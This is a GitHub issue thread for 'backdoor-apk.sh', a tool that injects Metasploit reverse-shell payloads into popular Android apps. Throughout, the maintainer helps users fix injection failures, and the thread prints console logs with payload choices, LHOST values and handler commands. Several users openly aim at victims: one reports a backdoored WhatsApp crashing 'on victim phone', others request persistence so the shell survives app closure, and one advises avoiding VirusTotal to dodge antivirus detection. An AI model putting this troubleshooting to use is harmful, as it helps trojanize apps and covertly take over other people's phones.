@magix21 The APK file you shared gets processed properly on my system:

[code]

I did notice a relative path to the APK in your run.log file:

[code]

Move the APK file to the directory where backdoor-apk.sh resides and try again.

[2017-01-25 09:16] Vancer commented on #71
I'll try this ASAP and close the issue if it's fixed!

[2017-01-25 09:41] Vancer commented on #71
The decompiling worked but im facing a new error here is a dump:
[*] Running backdoor-apk.sh v0.1.9 on Tue Jan 24 15:04:10 EST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 172

[2017-01-26 10:45] traget commented on #70
Ok, thanks!

[2017-01-26 15:09] dana-at-cp commented on #69
@magix21 I assume everything is working as expected after moving the APK file into the proper location. If not, then please open another issue.

[2017-01-26 15:09] #69 closed

[2017-01-29 14:23] Alf-Richards opened #72 "Failed to copy RAT smali files"
Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in orig

[2017-01-30 15:28] dana-at-cp commented on #72
@Alf-Richards Can you attach your run.log file?

[2017-01-30 15:30] dana-at-cp commented on #71
@Vancer I think your version of Metasploit framework is out of date. Can you update Metasploit and try again?

[2017-01-31 01:33] hyzo90 opened #73 "IPHONE ? IOS binder ?"
This is only for APK ?

[2017-01-31 15:03] dana-at-cp commented on #73
@hyzo90 Yes. Only Android at the moment.

[2017-01-31 15:03] #73 closed

[2017-02-02 23:20] e403 opened #74 "application always get ' unfortunately app has stopped '"
after android app injection and install the final app i always get ' unfortunately app has stopped '
i use parrot sec os linux 3.4
i download apk from googleplay , apkpure .... any site
and it still the problem !!

[2017-02-03 16:15] TLuigi003 opened #75 "Failed to locate smali file to hook in multidex APK"
I was just trying this with the Twitter APK but it didn't work:

Console output:

run.log contents: https://ghostbin.com/paste/uqh5o

I'm going to try with a different APK just for testing
Regards.

[2017-02-03 16:38] Abdulmalik5371 commented on #75
I have same issue when trying to backdoor Facebook apk and also the facebook messenger app....kindly help

[2017-02-03 16:42] dana-at-cp commented on #71
@Vancer Any update?

[2017-02-03 16:42] dana-at-cp commented on #72
@Alf-Richards Any update? I assume your Metasploit version is old.

[2017-02-03 16:44] Abdulmalik5371 commented on #58
@dana-at-cp for some reason the backdoor Whatsapp apk stops running after installation on victim phone...kindly help me solve the issue

[2017-02-03 16:56] dana-at-cp commented on #75
@TLuigi003 I confirmed this is a bug that is reproducible with the Twitter APK.

@Abdulmalik5371 I'm not sure about Facebook APKs at this time but I bet it's the same issue. I'll confirm soon.

Thanks for the reports.

[2017-02-03 16:56] Alf-Richards commented on #72
I was updated metasploit. Thak you

[2017-02-03 16:58] dana-at-cp commented on #74
@e403 Can you try Pandora from the Google Play Store? That app is a good baseline and has proven to be very stable after injection.

[2017-02-03 17:01] Abdulmalik5371 commented on #75
@dana-at-cp thanx for the early response...i appreciate it.

[2017-02-03 17:10] dana-at-cp commented on #75
The problem is that the current code correctly identifies the smali file to hook via the AndroidManifest.xml file but fails to search all of the smali file class directories.

For example, the Twitter APK decompiles into three smail file class directories:

1. smali
2. smali_classes2
3. smali_classes3

The current code searches the smail directory for the expected smali file but it actually exists

[2017-02-03 18:33] dana-at-cp commented on #72
@Alf-Richards The issue is now resolved?

[2017-02-03 19:09] e403 commented on #74
i get this bro

[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in origi

[2017-02-03 19:20] dana-at-cp commented on #74
@e403 Can you do the following for me on your system?

[code]

[2017-02-03 19:42] e403 commented on #74
please wait ..

[2017-02-03 19:48] e403 commented on #74
I can't understand the following ?
i go to the path
"backdoor-apk-master/backdoor-apk/third-party/android-sdk-linux/build-tools/23.0.3"
and these files only exist :
dx  lib  NOTICE.txt  zipalign

[2017-02-03 21:52] dana-at-cp commented on #74
@e403 Once in that directory try to execute the zipalign binary. For example:

[code]

[2017-02-05 04:19] YaRMa commented on #75
I am not sure about your answer, Mr. dana-at-cp .
How do we pass that "fail to locate smali file to hook" error!
Thz!

[2017-02-05 06:46] its-arun opened #76 "[Feature Request] Persistent Backdoor"
Would it be possible for you to add persistent backdoor to apk into this script? Currently the process is manual and has to be done using Android Studio or Maven.

https://github.com/kaeljurk/metasploit-android

Also please avoid scanning with Virus Total. You may use NoDistribute.com.

[2017-02-05 11:10] TLuigi003 commented on #75
@YaRMa not a fix but a workaround may be changing the line 441 of the backdoor-apk.sh from
` smali_file_to_hook=$MY_PATH/original/smali/$total_package$tmp.smali`
to
` smali_file_to_hook=$MY_PATH/original/smali_classes2/$total_package$tmp.smali`

(It may differ in the case of facebook apk)

I haven't tested this but I would try that while we wait for a proper solution

Regards.

[2017-02-05 21:42] Vancer commented on #71
Metasploit messes up after an update, i really don't know what's going on. If you want I can close the issue and open a new one once i fix metasploit ? Really sorry for being late. Sorry again.
@dana-at-cp

[2017-02-06 14:29] hahqmlta88 opened #77 "Failed to add hook"
I have tried backdooring 3 apks so far, 2 have given me the [!] Failed to locate smali file to hook bug, the last one (Pokerstars) gave me this error:

[--everything OK so far---]

End of run.log:

I am having issues with my connection as my country internet is really unstable, so I just downloaded the master.zip and extracted it, I am thinking maybe the zip file was corrupted from having to resum

[2017-02-06 15:11] dana-at-cp commented on #77
@hahqmlta88 I bet this is a duplicate of #75 but I'll try to confirm before closing this issue.

[2017-02-06 15:54] dana-at-cp commented on #77
@hahqmlta88 Can you attach the APK file you have?

[2017-02-06 16:21] dana-at-cp commented on #76
@its-arun There is reboot persistence via a the service mechanism. Am I missing something?

[2017-02-06 17:00] TLuigi003 commented on #75
@YaRMa It doesn't work, after replacing every reference to smali with smali_classes2 the script continues but it fails at recompiling the original project. So probably we need to wait until a proper patch is done.

Or make it ourselves :P

[2017-02-06 20:17] dana-at-cp commented on #75
@TLuigi003 @YaRMa Simply replacing every instance of "smali" with "smali_classes2" is not the proper fix and undoubtedly resulted in other breakage. Hang tight. I'll have a new release out soon.

[2017-02-07 02:11] its-arun commented on #76
@dana-at-cp yes it seems like reboot persistence

[2017-02-07 16:24] dana-at-cp commented on #72
Reporter disengaged. Closing.

[2017-02-07 16:24] #72 closed

[2017-02-07 16:25] dana-at-cp commented on #71
@Vancer No problem. Open a new issue if needed.

[2017-02-07 16:25] #71 closed

[2017-02-07 16:27] dana-at-cp commented on #76
@its-arun That capability already exists in the embedded RAT payload. Is it not working?

[2017-02-07 16:29] dana-at-cp commented on #77
Closing as duplicate of #75

[2017-02-07 16:29] #77 closed

[2017-02-07 22:15] dana-at-cp opened #78 "Recompilation fails on APKs containing custom attributes"
This is a known issue and unresolved bug in Apktool:

https://github.com/iBotPeaches/Apktool/issues/1157

Who has the time and experience to contribute a fix to the Apktool project?

[2017-02-07 22:18] dana-at-cp commented on #74
@e403 Can you share the output of running zipalign via the CLI?

[2017-02-08 13:41] rielinux opened #79 "Help how to set up proguard5.2.1 environment and configuration"
Hi there... need help to set up proguard5.2.1 environment and configuration ( i allready have all depedencies and proguard 5.2.1)  but i still have this notification on my Kali rolling

[*] Running backdoor-apk.sh v0.1.9 on Thu Feb  9 20:30:55 2017
[!] Check your environment and configuration. Couldn't find: third-party/proguard5.2.1/lib/proguard

Thanks...

[2017-02-09 23:22] hahqmlta88 commented on #77
I have got the APK on an other hard drive. Just wanted to say, after looking at #75 and decomposed the apk with apktool on that day it seems very likely it is in fact a duplicate.

[2017-02-10 16:30] dana-at-cp commented on #76
@its-arun Closing this issue as the feature already exists in the latest version.

[2017-02-10 16:30] #76 closed

[2017-02-10 16:31] dana-at-cp commented on #75
@TLuigi003 @YaRMa I have a fix created. I'll cut a new release in the next day or so.

[2017-02-10 16:33] dana-at-cp commented on #74
Closing this issue for now. Create a new issue if needed.

[2017-02-10 16:33] #74 closed

[2017-02-12 04:18] harshil2105 opened #80 "Persistence"
According to me a person has to be constantly using the compromised  as soon  as a person exits the apk or stop using the Apk I loose the shell..You can make a persistance.sh which we could upload in there system and then drop into shell then execute this persistence.sh file to get a shell even if he/she removes the app from there activity manager

[2017-02-12 04:21] harshil2105 commented on #80
I could easily add persistance on a straight payload APk which is not embedded with any other apk but my .sh script fails in your case

[2017-02-13 15:11] dana-at-cp commented on #80
@harshil2105 Can you share the shell script that works with the plain Metasploit payload APK? You should be able to attach it in a comment.

[2017-02-13 15:12] dana-at-cp commented on #79
@rielinux Hello. Did you remove the proguard directory that ships with backdoor-apk?

[2017-02-13 22:29] rielinux commented on #79
Nope, i didn't remove any proguard file and folder, it still there...

any suggestion ?

[2017-02-16 16:46] defcony opened #81 "[!] Failed to align recompiled APK"
I have tried this with random apks..but still somehow it always fails in Aligning the apk..please help
 @dana-at-cp

i have already installed ia32-libs on my linux,

[*] Running backdoor-apk.sh v0.1.9 on Fri Feb 17 03:39:23 IST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6)

[2017-02-17 09:23] defcony commented on #75
where can i find the patch??

[2017-02-17 18:42] dana-at-cp commented on #81
@defcony Hello. Can you go to the directory where zipalign resides and execute the binary? Share the output as a comment here. I think i know what is afoot.

[code]

[2017-02-17 18:48] dana-at-cp commented on #79
@rielinux Did you move any files or directories around? Since proguard is bundled with the project, the error you are getting doesn't really make sense. If things were moved around then it does make sense.

Have you tried to do a git clone to get a clean working directory for the project?

[2017-02-17 18:49] dana-at-cp commented on #75
@defcony A new version is coming ... I've been busy with other things unfortunately.

[2017-02-17 20:15] #80 closed

[2017-02-17 20:18] dana-at-cp commented on #75
@TLuigi003 @Abdulmalik5371 @YaRMa @defcony This bug is now fixed on master.

[2017-02-17 20:18] #75 closed

[2017-02-18 06:26] rielinux commented on #79
Thank man @dana-at-cp , now that solve my problem, i tried do a new git clone again and my problem solved. Thank you thank you.... #case-closed

[2017-02-18 06:46] rielinux commented on #81
Hi... @dana-at-cp  it's me again, i've got another problem over here.

But here come another problem:
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.7
[?] Please enter an LPORT value: 3333
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling origi

[2017-02-18 16:13] derinempati commented on #30
miko30  zipalign install

[2017-02-21 13:52] wongcheehong opened #82 "Failed to decompile original APK file"
Why I getting this error? Please help!
[*] Running backdoor-apk.sh v0.2.0 on Thu Feb  9 10:13:29 EST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.150
[?] Please ente

[2017-02-21 13:58] wongcheehong opened #83 "Failed to locate smali file to hook"
I try it with random system apk. Why this happened
[*] Running backdoor-apk.sh v0.2.0 on Thu Feb  9 10:19:29 EST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.150
[?]

[2017-02-21 22:45] dana-at-cp commented on #83
@wongcheehong Which system APK? I actually never tried one.

[2017-02-21 23:02] dana-at-cp commented on #82
@wongcheehong Read up on Apktool. You have to have proper framework files for Apktool to process certain APKs such as the one you are trying to use in this particular case.

[code]

[2017-02-21 23:02] #82 closed

[2017-02-21 23:03] dana-at-cp commented on #79
@rielinux No problem. Glad it's sorted.

[2017-02-21 23:03] #79 closed

[2017-02-22 06:05] wongcheehong commented on #83
Miui system apk
[AnalyticsCore.zip](https://github.com/dana-at-cp/backdoor-apk/files/792366/AnalyticsCore.zip)

[2017-02-22 06:08] wongcheehong commented on #83
@dana-at-cp  Miui system apk
[AnalyticsCore.zip](https://github.com/dana-at-cp/backdoor-apk/files/792377/AnalyticsCore.zip)

[2017-02-22 20:19] DanielJangua opened #84 "[!]Failed to recompile original project with backdoor"
Hello, I'm not able to recompile the apk, I already tried with different apks and I had the same problem. I am using Kali Linux 64bit, backdoor-apk v0.2.0, apktool v2.2.1.
Do you have any idea what might be causing the error? Thanks in advance!

Run.log file:

I: Using Apktool 2.2.1-dirty
I: Checking whether sources has changed ...
I: Smaling smali folder into classes.dex ...
I: Checking whether s

[2017-02-22 21:17] hxrofo commented on #65
@dana-at-cp : It's possible to do that, and I tried it successfully by tweaking the Manifest and MainActivity files, in addition to creating a new service, I called MyIntentService... I don't remember much, but still you can find your way by looking at this project by Giovanni Colonna
https://github.com/giovannicolonna/msfvenom-backdoor-android

[2017-02-23 13:47] peterpt opened #85 "Not an issue"
Thanks for your project .
I will implement your code with some changes adapted to one of the projects i am working at :
https://github.com/Screetsec/TheFatRat

after i adjust your script to work in sync with TheFatRat and push my changes to the git , feel free to join us and make improvements in case you want to contribute .

In changes that i am doing , i will leave your credits there .

[2017-02-23 20:13] dana-at-cp commented on #85
@peterpt Cool. Thanks for the heads up.

[2017-02-23 20:13] #85 closed

[2017-02-23 20:15] dana-at-cp commented on #84
@DanielJangua Apktool has limitations and known issues. It looks like you've encountered one of those issues.

[2017-02-23 20:15] #84 closed

[2017-02-24 20:37] peterpt commented on #83
firefox.apk is also bringing up that error .
https://justpaste.it/13vej

Do you have any idea why ?

[2017-02-24 21:37] #81 closed

[2017-02-25 12:57] peterpt opened #86 "Update packages"
You should update packages of tool to
android sdk 25.2.3 : https://developer.android.com/studio/index.html#download
proguard 5.3.2 :  https://sourceforge.net/projects/proguard/files/proguard/

[2017-02-26 07:43] motasimali commented on #86
@peterpt I have updated proguard successfully in thirdparty folder but i am unable to update sdk folder. Have you done this on your side ? if so then guide me

[2017-02-26 12:14] peterpt commented on #86
I did not updated here the packages manually , i did not tested here  none of them because i am occupied with other things .
However , backdoor-apk have the external tools needed in its folder , but i think you can install those tools updated outside from its directory and point the backdoor-apk script variables to system updated tools .

to install proguard,zipalign,dx on your system , all you ha

[2017-02-26 13:02] BArdokk opened #87 "Locating smali file to hook in original project...grep: android.intent.category.LAUNCHER: File o directory non esistente"
Locating smali file to hook in original project...grep: android.intent.category.LAUNCHER: File o directory non esistente
grep: android.intent.category.LAUNCHERgrep: android.intent.action.MAIN: File o directory non esistente
: File o directory non esistente
grep: android.intent.category.LAUNCHER: File o directory non esistente
grep: android.intent.action.MAIN: File o directory non esistente
done.
[

[2017-02-26 15:48] peterpt commented on #87
try with other apk to test .
read here why that happens :
https://github.com/dana-at-cp/backdoor-apk/issues/86

[2017-02-26 21:48] peterpt opened #88 "Question"
I have been looking into your script to find how the process to find a place to inject the payload code is processed  , but i have my head in water and i could not understand it very well .

One of the errors that users are having is that the default points used in apks to inject the payload are not found , by this i believe that somehow is a new apk security implementation .

In other scripts i u

[2017-02-27 14:32] dana-at-cp commented on #87
@BArdokk Please share the APK file. You can attach it to this issue on GitHub.

[2017-02-27 14:35] dana-at-cp commented on #86
@peterpt I'll look into getting these bits updated in the next release.

[2017-02-27 14:35] #86 closed

[2017-02-27 15:03] dana-at-cp commented on #88
@peterpt The algorithm is fairly simple:

* Find the 'android.intent.category.LAUNCHER' line in the AndroidManifest.xml file
* Determine if the "LAUNCHER" line is contained in an "activity" or "activity-alias" element
* Normalize the path to the smali file to hook
* Search the smali directories for the path to the smali file (e.g. it could be in 'smali' or 'smali_classes2' etc.)
* Inject code into

[2017-02-27 15:07] #88 closed

[2017-02-27 15:26] dana-at-cp commented on #83
@wongcheehong I checked out the AnalyticsCore.apk file and it appears that there are no smali files after decompilation:

[code]

[2017-02-27 15:54] dana-at-cp commented on #83
@peterpt The issue with the Firefox APK is a bug. I'll open a new issue.

[2017-02-27 15:54] #83 closed

[2017-02-27 16:00] dana-at-cp opened #89 "Locating smali file to hook logic fails with Firefox APK"
[code]

Relevant content from run.log file:

[code]

[2017-02-27 17:14] peterpt commented on #88
Do you want to collaborate and try to fix the error in one version of fatrat i have build to use your tool ?
I can create a private git for us to work with it and then you can check it out by using your tool in  fatrat why apk brings up error in apks .
I had to change many stuff in your code to be able to work with this fatrat version , specially the paths where files are decompiled , variables et

[2017-02-28 15:01] Shimadzu007 opened #90 "Failed to locate smali file to hook"
I tested the backdoor-apk in apk 3 and they all presented the following error: Failed to locate smali file to hook

Running backdoor-apk.sh v0.2.0 on Tue Feb 28 11:38:14 UTC 2017
[+] Android payload options:
1) meterpreter / reverse_http 4) shell / reverse_http
2) meterpreter / reverse_https 5) shell / reverse_https
3) meterpreter / reverse_tcp 6) shell / reverse_tcp
[?] Please select an Android p

[2017-02-28 15:16] dana-at-cp commented on #90
@Shimadzu007 Can you attach the APK file or files that do not work?

[2017-02-28 15:46] Shimadzu007 commented on #90
[ccleaner-v1-11-43-multi-android.zip](https://github.com/dana-at-cp/backdoor-apk/files/807283/ccleaner-v1-11-43-multi-android.zip)
[com.evozi.injector.zip](https://github.com/dana-at-cp/backdoor-apk/files/807285/com.evozi.injector.zip)
[smart-launcher-3-24-17.zip](https://github.com/dana-at-cp/backdoor-apk/files/807284/smart-launcher-3-24-17.zip)

[2017-02-28 15:47] Shimadzu007 commented on #90
Those..

[2017-02-28 17:23] dana-at-cp commented on #90
Each APK you shared fails to decompile/recompile using Apktool 2.2.1. I'm sorry but I do not support Apktool. Use other APKs files that can be processed by Apktool or contribute to Apktool development.

[code]

[2017-02-28 17:26] dana-at-cp commented on #90
The Apktool errors for at least one of the APK files you shared seems to be related to issue: #78

[2017-02-28 17:27] dana-at-cp commented on #90
The hooking issue itself appears to be a duplicate of issue: #89

[2017-02-28 17:27] dana-at-cp commented on #90
Closing as duplicate.

[2017-02-28 17:27] #90 closed

[2017-02-28 20:15] Shimadzu007 commented on #90
Please explain better how I can solve this problem, because I'm at the beginning I know I have a lot to learn.

[2017-02-28 20:34] dana-at-cp commented on #89
A fix is now on the develop branch. It will go out with the 0.2.1 release.

[2017-03-01 15:17] BArdokk commented on #87
TNX for all

[2017-03-01 15:46] dana-at-cp commented on #87
@BArdokk TNX is the APK used? Can you attach it?

[2017-03-02 23:23] thestropker commented on #87
i have same problem.

[2017-03-02 23:26] thestropker commented on #87
Use another apk and work

[2017-03-03 16:08] #87 closed

[2017-03-04 14:04] peterpt opened #91 "Locating smali file to hook logic fails when onCreate method is in a super class"
for some reason , backdoor-apk stays stuck in same place in most apks .

last pasrt of the log :  http://pastebin.com/uc04kRtU
apk file inside zip file .
[facebook.zip](https://github.com/dana-at-cp/backdoor-apk/files/818657/facebook.zip)

[2017-03-04 14:14] peterpt commented on #91
here it is another apk with same error , my guess is that is not searching strings code but when the backdoor-apk tries to locate the smali files of original apk , is pointed to a wrong path .
and then this error happens .
[mtk.zip](https://github.com/dana-at-cp/backdoor-apk/files/818659/mtk.zip)

[2017-03-06 15:48] dana-at-cp commented on #91
@peterpt There is a fix on the develop branch. Can you check out that code and retest?

[2017-03-06 16:28] dana-at-cp commented on #91
@peterpt I just tested both and got failures as well.

The MTK APK appears to not follow developer guidelines. Specifically, around the 'android:name' value for activity elements:

[code]

[https://developer.android.com/guide/topics/manifest/activity-element.html#nm](https://developer.android.com/guide/topics/manifest/activity-element.html#nm)

The Facebook APK appears to have uncovered another ed

[2017-03-06 16:38] peterpt commented on #91
is there a way to implement a list with possibles entries to look ?
example : script will work as default until it does not find the default android entry in android manifest .
When it gets to that part , will consult a filename with a list of possibles names to look in android manifest , and when finds a pattern that coincides with the list then apply automatically the rat smali file there .

Do

[2017-03-06 16:52] dana-at-cp commented on #91
@peterpt The Facebook APK seems like an oddball case but I think the solution is to present options for hooking when the AndroidManifest.xml processing path yields no results (as you suggested). I will likely implement that as an enhancement.

[2017-03-09 16:16] securunder commented on #17
help my plz
File: /root/backdoor-apk/backdoor-apk/original/smali/net/11/courses/d.smali
Target: "Invalid certificate"
Reg: v1
Shift count: 16
Shift tr value: [K-ZA-Jk-za-j]
Replacement: "16Sxfkvsn mobdspsmkdo"
Found launcher line in manifest file: 106
Activity lines found above launcher line: 1
Value of android_target_activity:
Value of android_name: com/kiloo/unityutilities/UnityPluginActivity
Th

[2017-03-09 16:17] securunder commented on #17
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for

[2017-03-09 20:28] aleemladha opened #92 "error generating date"
Invalid date.
![screenshot from 2017-03-09 13-58-35](https://cloud.githubusercontent.com/assets/26311391/23769304/ed273712-04dc-11e7-97aa-0cc47423dba3.png)

[2017-03-10 06:51] aleemladha commented on #92
Error signing the backdoor
![image](https://cloud.githubusercontent.com/assets/26311391/23785120/11d2df36-0577-11e7-99d1-aa1f856dcd53.png)

[2017-03-10 16:21] dana-at-cp commented on #92
@aleemladha Please share the APK file or files you are working with that are producing these errors.

[2017-03-10 22:04] dana-at-cp commented on #89
Fixed in version 0.2.1 now on master.

[2017-03-10 22:04] #89 closed

[2017-03-10 22:04] dana-at-cp commented on #91
Fixed in version 0.2.1 now on master.

[2017-03-10 22:04] #91 closed

[2017-03-10 22:06] dana-at-cp commented on #65
@Qurexhi I confirmed that reboot persistence is still working.

[2017-03-10 22:06] #65 closed

[2017-03-10 23:38] peterpt opened #93 "some bugs"
Hi , i have been testing your new master repo and i found a few bugs .
here are some steps i did so far to bypass some bugs :
for some reason , your detection on "if exists files in original decompiled apk folder" had some issue , i had to by pass that check by ignoring the "if" code at lines : 271 to 274

then everything went well until i get this error :
- Failed to run dx on proguard processed

[2017-03-11 06:24] aleemladha commented on #92
https://dl.dropboxusercontent.com/u/103296725/cp-apk.zip

[2017-03-11 15:34] peterpt commented on #93
Well , it looks that the output of backdoor apk depends on tools versions used .
I also noted that facebook.apk is the only one giving me issues after changing somethings here .
I am uploading a video to youtube showing all my changes in realtime and then testing new apks for you to see .
I also show in video how to bypass some errors that i encounter on some apps that backdoor-apk uses .

Finally

[2017-03-12 02:08] dana-at-cp commented on #93
@peterpt Hello. I'm sorry but it's not clear what is being reported. If you have a bug to report then please do the following:

* Be as concise and accurate as possible
* Describe the environment (version of backdoor-apk, has it been modified, etc.)
* Attach the APK file used so that I (and others) can attempt to reproduce

[2017-03-12 02:08] #93 closed

[2017-03-12 10:45] peterpt commented on #93
Hi , well , it was a bug that i corrected in real time .
- backdoor-apk does not work if the original apk is outside backdoor-apk main folder

Some apks give issues , but in generally the tool is wornking fine , the video have 50 minutes because i was not expecting so many susprises when i was testing the apks .
The man objective on video was to show you that if you try to compile a rat apk file o

[2017-03-12 20:24] peterpt opened #95 "too many arguments - failed to add hook ."
i was trying to compile youtube.apk when i got this message :
[*] Adding hook in original smali file..../backdoor-apk.sh: line 96: [: too many arguments
done.

the log says :
http://pastebin.com/8Hqw3rzw

I have created a folder with some random apks i downloaded that backdoor-apk is unable to find hook points to inject the smali file .
if you check this page you will see 2 folders :
https://www.m

[2017-03-13 01:59] peterpt commented on #95
some news :
1st - unsupported minor version error on your proguard is related to user openjdk version .

This means that user must install openjdk 8 and change java alternatives to openjdk8 .
"apt-get install openjdk-8-jre openjdk-8-jdk"
and
update-alternatives --config java
and selecting openjdk 8 will solve proguard issue .

aapt in user system will probably not compatible with the aapt android

[2017-03-13 15:24] peterpt commented on #95
with apktool 2.2.2 in third party tools solve all compilation issues with aapt .
However , those files where the tool can not find an hook point will stay in the same situation .

[2017-03-15 16:04] dana-at-cp commented on #95
@peterpt Thanks. I will look into the the specific APK issues. I saw your pull request for Apktool 2.2.2 ... I'll investigate this further to see if it resolves some of the current Apktool issues.

[2017-03-15 16:04] #95 closed

[2017-03-15 16:18] dana-at-cp commented on #92
@aleemladha I did not get the "invalid date" error with any of the APK files you shared. 3 out of 4 of the APK files were processed properly with v0.2.1 of backdoor-apk. The one APK file that was not processed correctly appears to be a non-standard APK that didn't fully decompile or is missing framework files required to decompile properly.

[2017-03-15 16:18] #92 closed

[2017-03-15 16:34] peterpt opened #97 "Backdoor-apk implemented in fatrat 1.9"
hi , i am just posting to say that backdoor-apk was implemented in TheFatRat Tool at :
here :
https://github.com/peterpt/TheFatRat/

and here :
https://github.com/Screetsec/TheFatRat

we made some changes to your code to be able to work with fatrat .

[2017-03-15 16:40] #58 closed

[2017-03-15 16:42] dana-at-cp commented on #97
@peterpt Ok. Thanks for the heads up.

[2017-03-15 16:42] #97 closed

[2017-03-20 18:54] kn0wledge opened #98 "Cannot find resource script: backdoor-apk.rc"
Hi @dana-at-cp ,

im sorry for the  very noob question, but i compiled the apk and ran:
`msfconsole -r backdoor-apk.rc`
for the handler but i got the below error :

any ideas? ?

[2017-03-20 19:16] dana-at-cp commented on #98
@kn0wledge Can you share your command-line output and the run.log file?

[2017-03-23 11:43] sagarbatra opened #99 "Fail to decompile rat-apk file"
this error is due to .... switch -o .....because while decompiling it use ...apktool -d -f -o ..but there is no -o switch in apktool.

[2017-03-24 12:46] #98 closed

[2017-03-24 12:49] dana-at-cp commented on #99
@sagarbatra Make sure you have version 2.2.1 of Apktool or later.

[code]

[2017-03-24 12:50] #99 closed

[2017-03-26 08:42] nada94 commented on #79
i have the same problem and i don't understand your solution , please can you write the code to fix it for me , thank you

[2017-03-30 01:05] xXDUNNKILLED1Xx opened #100 "Backdoor session closes instantly"
As soon as i open my infected apk file, i get a meterpreter session but it instantly closes for "Reason :died"

[2017-03-30 13:27] dana-at-cp commented on #100
@xXDUNNKILLED1Xx Please attach the original APK file.

[2017-03-30 18:47] durkh3im opened #101 "Error with meterpreter"
Hello,

Before all, awesome work. Im doing a entry for mi blog and i get this error in msf:

[-] Handler failed to bind to 192.168.197.129:7777:-  -
[-] Handler failed to bind to 0.0.0.0:7777:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:7777).

I execute this in msf:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_t

[2017-03-30 19:53] xXDUNNKILLED1Xx commented on #100
I will try a different one real quick but it will not let me upload it because the file size is over 10mb, but here is the link to the one i used:

[http://www.apkmirror.com/apk/musical-ly/musical-ly/musical-ly-5-3-3-release/musical-ly-5-3-3-android-apk-download/download/](url)

[2017-03-31 13:43] dana-at-cp commented on #101
@durkh3im When you see something like this:

[code]

Generally, that means you have something leftover that is already binding to that port.

Make sure you are closing your older Meterpreter sessions.

[2017-03-31 13:43] #101 closed

[2017-04-03 20:27] dana-at-cp commented on #100
@xXDUNNKILLED1Xx There are known issues and limitations of Apktool. See #78 for a common issue encountered by users of this project. Also, try some APKs directly from the Google Play store or directly from the developer. For example, the latest version of WhatsApp.

[2017-04-05 20:37] #100 closed

[2017-04-05 20:38] xXDUNNKILLED1Xx commented on #100
Thank you, I'll close it since it's nothing wrong with your code but apktool and maybe the apks I have.

[2017-04-11 17:09] ijadmy97 commented on #57
i have a same problem like Ehsan-Abbaspour

Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copyin

[2017-04-11 17:50] ijadmy97 opened #102 "Failed to copy RAT smali files"
i have a problem using this tool:

im using metasploit4.14.5

[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file

[2017-04-13 01:56] pacman-vzla commented on #68
I did apt-get install dex2jar and I get the error "Could not locate the dex2jar package"

[2017-04-13 02:45] pacman-vzla opened #103 "Could not find: d2j-dex2jar"
When I start apk-backdoor.sh I get the error:
 [!] Check your environment and configuration. Could not find: d2j-dex2jar
Try apt-get install dex2jar and I get the error "The dex2jar package could not be located"

[2017-04-13 13:08] netship01 commented on #30
I: Building resources...
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 139): [/usr/bin/aapt, p, --min-sdk-version, 9, --target-sdk-version, 21, --version-code, 53156713, --version-name, 34.0.0.13.68, -F, /tmp/APKTOOL3447691795823034561.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framew

[2017-04-15 15:29] peterpt commented on #103
dex2jar can be found in kali repositories or can be downloaded here :
https://sourceforge.net/projects/dex2jar/

In case you want to install it by apt , then change your repositories to kali and then apply :
- apt-get update && apt-get install dex2jar

after instalation remove kali repositories from your sources list and do an "apt-get update" with only your linux OS original repositories .

By de

[2017-04-16 01:52] netship01 commented on #30
Solved by updating apktool and installing libs.

[2017-04-17 20:55] dana-at-cp commented on #102
@ijadmy97 Are you using an older version of Metasploit? That's what it looks like to me.

[2017-04-17 20:56] dana-at-cp commented on #103
@pacman-vzla Did you get this resolved?

[2017-04-19 03:22] pacman-vzla commented on #103
Yeah, thanks <3

[2017-04-19 14:55] #103 closed

[2017-04-19 17:21] dana-at-cp commented on #102
@ijadmy97 I'm running Metasploit framework 4.14.11 and everything seems normal.

[2017-04-22 05:28] #102 closed

